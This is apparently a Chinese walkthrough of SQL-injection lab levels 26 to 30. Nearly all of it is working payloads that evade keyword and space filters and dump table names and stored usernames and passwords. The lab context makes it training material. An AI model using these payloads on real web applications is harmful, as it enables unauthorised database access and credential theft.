第26关 (过滤# -- 空格 and or 等等)
查数据库
这关可以看到,他过滤了我们很多字符
那么我们开始尝试绕过过滤
空格使用括号绕过 and和or使用双写绕过
?id=1'aandnd(updatexml(1,concat(0x7e,(select(database())),0x7e),1))aandnd'1=1
查表
?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))aandnd'1=1
查列
?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))aandnd'1=1
查数据
?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))aandnd'1=1
第27关(过滤 union、select、注释、空格 )
查数据库
?id=1'and(updatexml(1,concat(0x7e,database(),0x7e),1))and'1=1
查表
?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))and'1=1
查列
?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))),1))and'1=1
查数据
?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(password,username))from(users))),1))and'1=1
第28关(双写+%0a+大小写+('1')=('1绕过)
查数据
?id=0')%09ununion%09selection%09select%091,database(),3%09and%09('1'='1
查表
?id=0')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and('1=1
查列
?id=0')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1=1
第29关( ' 闭合)
查库
?id=' union select 1,2,database() --+
查表
?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
查列
?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
查数据
?id=' union select 1,2,group_concat(username,0x7e,password) from users--+
第30关( " 闭合)
查库
?id=" union select 1,2,database() --+
查表
?id=" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
查列
?id=" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
查数据
?id=" union select 1,2,group_concat(username,0x7e,password) from users--+